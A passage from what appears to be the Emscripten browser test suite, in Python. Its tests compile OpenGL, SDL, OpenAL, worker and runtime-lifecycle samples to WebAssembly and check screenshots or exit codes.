self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut']) @requires_graphics_hardware def test_glgears_deriv(self): self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2, args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], message='You should see animating gears.') assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed' @requires_graphics_hardware def test_glbook(self): self.emcc_args.remove('-Werror') programs = self.get_library('third_party/glbook', [ Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'), Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'), Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'), Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'), Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'), Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'), Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'), ], configure=None) def book_path(*pathelems): return test_file('third_party/glbook', *pathelems) for program in programs: print(program) basename = os.path.basename(program) args = ['-lGL', '-lEGL', '-lX11'] if basename == 'CH10_MultiTexture.o': shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga') shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga') args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga'] elif basename == 'CH13_ParticleSystem.o': shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga') args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage self.btest(program, reference=book_path(basename.replace('.o', '.png')), args=args) @requires_graphics_hardware @parameterized({ 'normal': (['-sFULL_ES2=1'],), # Enabling FULL_ES3 also enables ES2 automatically 'full_es3': (['-sFULL_ES3=1'],) }) def test_gles2_emulation(self, args): print(args) shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga') shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga') shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga') for source, reference in [ (Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')), # (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL (Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')), # (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL (Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')), (Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')), (Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')), ]: print(source) self.btest(source, reference=reference, args=['-I' + test_file('third_party/glbook/Common'), test_file('third_party/glbook/Common/esUtil.c'), test_file('third_party/glbook/Common/esShader.c'), test_file('third_party/glbook/Common/esShapes.c'), test_file('third_party/glbook/Common/esTransform.c'), '-lGL', '-lEGL', '-lX11', '--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args) @requires_graphics_hardware def test_clientside_vertex_arrays_es3(self): self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2']) def test_emscripten_api(self): self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL']) def test_emscripten_api2(self): def setup(): create_file('script1.js', ''' Module._set(456); ''') create_file('file1.txt', 'first') create_file('file2.txt', 'second') setup() self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')) self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM']) # check using file packager to another dir self.clear() setup() ensure_dir('sub') self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')) shutil.copyfile(Path('sub/test.data'), 'test.data') self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM']) def test_emscripten_api_infloop(self): self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7) def test_emscripten_fs_api(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL']) def test_emscripten_fs_api2(self): self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"]) self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"]) @requires_threads def test_emscripten_main_loop(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]: self.btest_exit('emscripten_main_loop.cpp', args=args) @requires_threads def test_emscripten_main_loop_settimeout(self): for args in [ [], # test pthreads + AUTO_JS_LIBRARIES mode as well ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'], ]: self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args) @requires_threads def test_emscripten_main_loop_and_blocker(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args) @requires_threads def test_emscripten_main_loop_and_blocker_exit(self): # Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The # app should still stay alive until the loop ends self.btest_exit('emscripten_main_loop_and_blocker.cpp') @requires_threads def test_emscripten_main_loop_setimmediate(self): for args in [[], ['--proxy-to-worker'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args) def test_fs_after_main(self): for args in [[], ['-O1']]: self.btest('fs_after_main.cpp', '0', args=args) def test_sdl_quit(self): self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL']) def test_sdl_resize(self): # FIXME(https://github.com/emscripten-core/emscripten/issues/12978) self.emcc_args.append('-Wno-deprecated-declarations') self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL']) def test_glshaderinfo(self): self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut']) @requires_graphics_hardware def test_glgetattachedshaders(self): self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL']) # Covered by dEQP text suite (we can remove it later if we add coverage for that). @requires_graphics_hardware def test_glframebufferattachmentinfo(self): self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL']) @requires_graphics_hardware def test_sdlglshader(self): self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_sdlglshader2(self): self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True) @requires_graphics_hardware def test_gl_glteximage(self): self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL']) @requires_graphics_hardware @requires_threads def test_gl_textures(self): for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER']]: self.btest('gl_textures.cpp', '0', args=['-lGL'] + args) @requires_graphics_hardware def test_gl_ps(self): # pointers and a shader shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1) @requires_graphics_hardware def test_gl_ps_packed(self): # packed data that needs to be strided shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1) @requires_graphics_hardware def test_gl_ps_strides(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins']) @requires_graphics_hardware def test_gl_ps_worker(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True) @requires_graphics_hardware def test_gl_renderers(self): self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_gl_stride(self): self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_gl_vertex_buffer_pre(self): self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_gl_vertex_buffer(self): self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1) @requires_graphics_hardware def test_gles2_uniform_arrays(self): self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True) @requires_graphics_hardware def test_gles2_conformance(self): self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1']) @requires_graphics_hardware def test_matrix_identity(self): self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre_regal(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL']) @requires_graphics_hardware @requires_sync_compilation def test_cubegeom_pre_relocatable(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre2(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre3(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @parameterized({ '': ([],), 'tracing': (['-sTRACE_WEBGL_CALLS'],), }) @requires_graphics_hardware def test_cubegeom(self, args): # proxy only in the simple, normal case (we can't trace GL calls when # proxied) self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args) @requires_graphics_hardware def test_cubegeom_regal(self): self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True) @requires_threads @requires_graphics_hardware def test_cubegeom_regal_mt(self): self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False) @requires_graphics_hardware def test_cubegeom_proc(self): create_file('side.c', r''' extern void* SDL_GL_GetProcAddress(const char *); void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us void *getBindBuffer() { if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer"); return glBindBuffer; } ''') # also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks for opts in [[], ['-O1'], ['-Os']]: self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_glew(self): self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL']) @requires_graphics_hardware def test_cubegeom_color(self): self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_normal(self): self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True) @requires_graphics_hardware def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True) @requires_graphics_hardware def test_cubegeom_normal_dap_far(self): # indices do nto start from 0 self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware @no_firefox('fails on CI but works locally') def test_cubegeom_normal_dap_far_glda_quad(self): # with quad self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_mt(self): self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture @requires_graphics_hardware def test_cubegeom_color2(self): self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True) @requires_graphics_hardware def test_cubegeom_texturematrix(self): self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_fog(self): self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre_vao(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre_vao_regal(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre2_vao(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_pre2_vao2(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware @no_swiftshader def test_cubegeom_pre_vao_es(self): self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cubegeom_u4fv_2(self): self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_cube_explosion(self): self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True) @requires_graphics_hardware def test_glgettexenv(self): self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1']) def test_sdl_canvas_blank(self): self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png') def test_sdl_canvas_palette(self): self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png') def test_sdl_canvas_twice(self): self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png') def test_sdl_set_clip_rect(self): self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png') def test_sdl_maprgba(self): self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3) def test_sdl_create_rgb_surface_from(self): self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png') def test_sdl_rotozoom(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3) def test_sdl_gfx_primitives(self): self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1) def test_sdl_canvas_palette_2(self): create_file('pre.js', ''' Module['preRun'].push(function() { SDL.defaults.copyOnLock = false; }); ''') create_file('args-r.js', ''' Module['arguments'] = ['-r']; ''') create_file('args-g.js', ''' Module['arguments'] = ['-g']; ''') create_file('args-b.js', ''' Module['arguments'] = ['-b']; ''') self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL']) self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL']) self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL']) def test_sdl_ttf_render_text_solid(self): self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL']) def test_sdl_alloctext(self): self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL']) def test_sdl_surface_refcount(self): self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1') def test_sdl_free_screen(self): self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png') @requires_graphics_hardware def test_glbegin_points(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins']) @requires_graphics_hardware def test_s3tc(self): shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds') self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_s3tc_ffp_only(self): shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds') self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL']) @no_chrome('see #7117') @requires_graphics_hardware def test_aniso(self): shutil.copyfile(test_file('water.dds'), 'water.dds') self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']) @requires_graphics_hardware def test_tex_nonbyte(self): self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_float_tex(self): self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut']) @requires_graphics_hardware def test_subdata(self): self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut']) @requires_graphics_hardware def test_perspective(self): self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) @requires_graphics_hardware def test_glerror(self): self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL']) def test_openal_error(self): for args in [ [], ['-lopenal', '-sSTRICT'], ['--closure=1'] ]: print(args) self.btest('openal_error.c', expected='1', args=args) def test_openal_capture_sanity(self): self.btest('openal_capture_sanity.c', expected='0') def test_runtimelink(self): create_file('header.h', r''' struct point { int x, y; }; ''') create_file('supp.c', r''' #include <stdio.h> #include "header.h" extern void mainFunc(int x); extern int mainInt; void suppFunc(struct point *p) { printf("supp: %d,%d\n", p->x, p->y); mainFunc(p->x + p->y); printf("supp see: %d\n", mainInt); } int suppInt = 76; ''') create_file('main.c', r''' #include <stdio.h> #include <assert.h> #include "header.h" extern void suppFunc(struct point *p); extern int suppInt; void mainFunc(int x) { printf("main: %d\n", x); assert(x == 56); } int mainInt = 543; int main( int argc, const char *argv[] ) { struct point p = { 54, 2 }; suppFunc(&p); printf("main see: %d\nok.\n", suppInt); assert(suppInt == 76); return 0; } ''') self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2']) self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm']) def test_pre_run_deps(self): # Adding a dependency in preRun will delay run create_file('pre.js', ''' Module.preRun = function() { addRunDependency(); out('preRun called, added a dependency...'); setTimeout(function() { Module.okk = 10; removeRunDependency() }, 2000); }; ''') for mem in [0, 1]: self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)]) def test_mem_init(self): self.set_setting('WASM_ASYNC_COMPILATION', 0) create_file('pre.js', ''' function myJSCallback() { // called from main() Module._note(1); } Module.preRun = function() { addOnPreMain(function() { Module._note(2); }); }; ''') create_file('post.js', ''' Module._note(4); // this happens too early! and is overwritten when the mem init arrives ''') args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'] # with assertions, we notice when memory was written to too early expected = 'abort:Assertion failed: native function `note` called before runtime initialization' self.btest('mem_init.cpp', expected=expected, args=args) # otherwise, we just overwrite self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0']) def test_mem_init_request(self): def test(what, status): print(what, status) create_file('pre.js', ''' var xhr = Module.memoryInitializerRequest = new XMLHttpRequest(); xhr.open('GET', "''' + what + '''", true); xhr.responseType = 'arraybuffer'; xhr.send(null); console.warn = function(x) { if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) { maybeReportResultToServer('got_error'); } console.log('WARNING: ' + x); }; ''') self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1']) self.set_setting('EXIT_RUNTIME') test('test.html.mem', 'exit:0') test('nothing.nowhere', 'got_error') def test_runtime_misuse(self): post_prep = ''' var expected_ok = false; function doCcall(n) { ccall('note', 'string', ['number'], [n]); } var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization function doCwrapCall(n) { var str = wrapped(n); out('got ' + str); assert(str === 'silly-string'); } function doDirectCall(n) { Module['_note'](n); } ''' post_test = ''' var ok = false; try { doCcall(1); ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort } catch(e) { out('expected fail 1: ' + e.toString()); assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else ABORT = false; // hackish } assert(ok === expected_ok); ok = false; try { doCwrapCall(2); ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort } catch(e) { out('expected fail 2: ' + e.toString()); assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else ABORT = false; // hackish } assert(ok === expected_ok); ok = false; try { doDirectCall(3); ok = true; // should fail and not reach here, runtime is not ready yet so any code execution } catch(e) { out('expected fail 3:' + e.toString()); assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else ABORT = false; // hackish } assert(ok === expected_ok); ''' post_hook = r''' function myJSCallback() { // Run on the next event loop, as code may run in a postRun right after main(). setTimeout(function() { var xhr = new XMLHttpRequest(); assert(Module.noted); xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]); xhr.send(); setTimeout(function() { window.close() }, 1000); }, 0); // called from main, this is an ok time doCcall(100); doCwrapCall(200); doDirectCall(300); } ''' % self.port create_file('pre_runtime.js', r''' Module.onRuntimeInitialized = function(){ myJSCallback(); }; ''') for filename, extra_args, second_code in [ ('runtime_misuse.cpp', [], 600), ('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit() ]: for mode in [[], ['-sWASM=0']]: print('\n', filename, extra_args, mode) print('mem init, so async, call too early') create_file('post.js', post_prep + post_test + post_hook) self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE) print('sync startup, call too late') create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook) self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE) print('sync, runtime still alive, so all good') create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook) self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE) def test_cwrap_early(self): self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0') def test_worker_api(self): self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one']) self.btest('worker_api_main.cpp', expected='566') def test_worker_api_2(self): self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1']) self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11') def test_worker_api_3(self): self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one']) self.btest('worker_api_3_main.cpp', 